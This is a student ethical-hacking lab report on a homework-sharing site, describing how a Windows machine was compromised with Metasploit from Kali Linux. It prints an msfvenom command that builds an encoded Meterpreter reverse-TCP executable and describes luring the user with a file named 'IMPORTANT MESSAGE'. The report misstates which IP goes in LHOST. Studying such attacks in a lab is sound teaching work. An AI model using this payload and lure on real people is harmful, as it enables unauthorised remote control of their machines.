Kali Linux Exploit using Metasploit

Verified

Added on 2023/06/04

AI Summary

This article discusses the use of Metasploit to carry out penetration tests on Windows machines remotely. It provides a step-by-step guide on how to set up the experiment and execute the exploit. The article also highlights the importance of knowledge on common penetration tests to protect organization data resource.

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.

Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

💎 Get Pro

ICT ETHICAL HACKING (EXPLOITS) 2
Introduction
In this era where cybersecurity has emerged to be a major threat to information systems,
knowledge on some of the common penetration tests which can be used by attackers to compromise
organization systems is of paramount importance. This is because it enables the IT professionals to test
and implement the necessary measures to protect the organization data resource.
Our workshop session on common exploitation approaches used by attackers, we experimented
Metasploit exploitation under Kali Linux platform. The targeted machine was however was supposed to
be operating under Windows operating system regardless of the version (windows XP, 7, 8, 8.1 and 10).
The main aim of our experiment was to learn how attackers can be able to penetrate into machines
operating on windows remotely and without the consent of the main user of the machine (Dieterle, 2016).
Metasploit is a project which enables the attackers carry out penetration into the victim’s machine
through development of ID signatures. To achieve that, the tool enables the attackers to come up with an
exploit code which is then executed on targeted remote machines to enable them get into the machine
with full user rights (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.241).. To set up out penetration
test experiment, we required: Metasploit framework with full Ruby packages installed under the Kali
Linux platform machine and two computers running different operating systems (one Kali Linux and the
other Windows). The two machines were set under same NAT network in order to allow us retrieve their
IP addresses and PORT numbers easily. Also, since an antivirus in the targeted machine would hinder us
from realizing our exploitation objective, we made sure that the windows platform machine did not have
any antivirus software operating on it
The penetration test entirely involved carrying out commands on the Kali Linux platform
machine and the main Metasploit command we utilized was the Msfconsole because of its flexibility and
other favorable features supporting Metasploit framework. To be able to gain access into the second
machine, we needed to know the machines IP address and any of its free PORT numbers. To acquire the

ICT ETHICAL HACKING (EXPLOITS) 3
two, we simply used Netcut software considering the fact that the two machines were operating under the
same NAT network (Muniz, 2013).
Into the real business, we started by creating executable files whose unique identifiers were
basically the IP address and the PORT number we had obtained from the targeted machine using the
Msfconsole command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows
machine) LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/
(desktop name).exe”. The next step was to make sure that the file is send to the targeted machine and trick
the user into opening it. So we saved the folder as “IMPORTANT MESSAGE”, to be sure that the user
will definitely be tempted to open it.
After sending the file, we activated our metasploit framework to listen to the file using the
Msfconsole command “exploit”. Under this state, the “meterpreter” would be activated on our Kali Linux
machine automatically when the targeted user opens the sent files and would enable us get access into his
or her machine immediately. So, after the file was opened on the second machine, we automatically
gained access into the victim’s machine with the full control rights just like a person logged into the
machine physically. We could carry out several operations like editing files, deleting files, viewing
folders and removing some directories (Weidman, 2014). That was a clear implication that we had gotten
into the machine remotely without the owner’s consent.
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing
Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration
testing with Metasploit framework and methodologies. In Computational Intelligence and
Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.

ICT ETHICAL HACKING (EXPLOITS) 4
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.

1 out of 4

+13062052269

info@desklib.com

Kali Linux Exploit using Metasploit

Contribute Materials

Secure Best Marks with AI Grader

Related Documents

Kali Linux Exploit using Metasploit for Ethical Hacking

Kali Linux Exploit using Metasploit for Windows OS

Kali Linux Exploit using Metasploit for Windows OS

Kali Linux Exploit using Metasploit

Workshop - Exploit Development

Penetration Testing on Linux Machine: Task 3